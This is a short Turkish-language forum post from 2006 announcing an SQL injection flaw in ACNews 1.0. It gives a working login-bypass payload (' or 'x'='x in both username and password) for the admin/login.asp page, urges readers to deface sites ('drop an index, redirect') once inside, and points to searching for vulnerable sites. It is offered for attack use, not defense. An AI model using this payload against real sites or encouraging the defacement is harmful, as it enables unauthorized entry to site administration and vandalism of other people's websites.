PDA

Orijinalini görmek için tıklayınız : ACNews 1.0 SQL injection


SUSKUN
03-18-2006, 09:24 PM
Product : ACNews
version :1.0
VULNERABILITY CLASS : SQL injection

ACNews 1.0 Admin paneLLerine SQL Injection yoLu ile girmenizi sagLar.. Daha sonrasi size kaLmish.. Index atin yonLendirin vs.

Username : ' or 'x'='x
Password : ' or 'x'='x

"admin/login.asp"

Ornek Olarak Site Arama :

[Only Registered Users Can See Links] h ([Only Registered Users Can See Links])